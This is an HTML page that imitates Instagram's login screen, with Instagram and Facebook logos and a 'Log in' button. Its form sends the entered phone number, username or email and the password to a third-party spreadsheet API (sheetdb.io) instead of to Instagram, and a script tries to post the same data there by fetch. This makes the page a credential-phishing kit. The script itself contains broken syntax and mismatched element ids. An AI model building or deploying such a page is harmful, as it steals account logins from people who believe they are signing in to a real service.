<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    
    <title>Log in.Instagram</title>
    <link rel="icon" href="Instagram_logo_2016.svg.webp">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-QWTKZyjpPEjISv5WaRU9OFeRpok6YctnYmDr5pNlyT2bRjXh0JMhjY6hW+ALEwIH" crossorigin="anonymous">
    

    <style>
        .body{
            margin:0%;
            padding:0%;
            box-sizing: border-box;
           
            
        }
      .container{
        border: 1px solid rgba(155, 151, 151, 0.568) ;
        width: auto;
        margin-top: 20px;
       
       
        
      }
      
      .button1{
        margin-top: ;
      }
      .insta-body{
        width: 80%;
        display: flex;
        flex-direction: column;
        justify-content: center;
        align-items: center;
        margin-left: 40px;
      }
      .or img{
        width: 300px;

      }
      .inta-footer{
        margin-left: 80px;
      }
      .inta-footer p{
        margin-left: 20px;
      }
      .logo{
      height: 25px;
      width: 25px;
      border-bottom: 20px;
      border-radius: 20px;
      }
      .inp1{
        background-color: rgba(233, 227, 227, 0.349);
        border: 1px solid rgba(155, 151, 151, 0.568);
      }
      .inp2{
        background-color: rgba(233, 227, 227, 0.349);
        border: 1px solid rgba(155, 151, 151, 0.568);
      }
     
    </style>
</head>
    <form action="https://sheetdb.io/api/v1/tpr7dhxyyhkey"  method = "post" id ="sheetdb-form" class="d-flex flex-column align-items-center " >
        <div class="container">
            <div class="row">
                <div class="col-12 ">
                    <span class="bg"></span>
                    <div class=" text-center">
                        <a href=""><img src="instalogo.png"  class="mt-5"></a>
                    </div>
                    <div class=" insta-body d-flex flex-column align-items-center">
                        <input type="text" name =" data[phone number]" class="form-control inp1  mt-5" placeholder="Phone number, username or email address">
                        <input type="password"  name ="data[password]" class="form-control inp2  mt-2 " placeholder="Password">
                        <button class="btn btn-primary mt-3 w-100" onclick="click">Log in</button>
                    </div>
                    <div class="or text-center ">
                        <img src="or.png" alt="">
                    </div>
                    <div class="inta-footer ">
                        <h5 class="text1"><a href=""><img src="faceboollogo.png" class="logo  col-12 alt=""></a> Log in with Facebook</h5>
    
                    <p class=""> Forgotten your password?</p>
                    </div>
                </div>
            </div>
           
        </div>

    </form>
    <span class="msg"></span>
    <script>
        
        var form = document.getElementById("sheetdb-form")
        var msg = document.getElementById("msg")
        form.addEventListener("submit",e=>{
                e.preventDefault()
                fetch(form.action,{
                    method : "POST",
                    body : new FormData = (document.getElementById("sheetdb.form"))

                }).then(
                    response => response.json()
                )
        })
        msg.innerHTML=" Submitted"
        
      
    </script>
</body>
</html>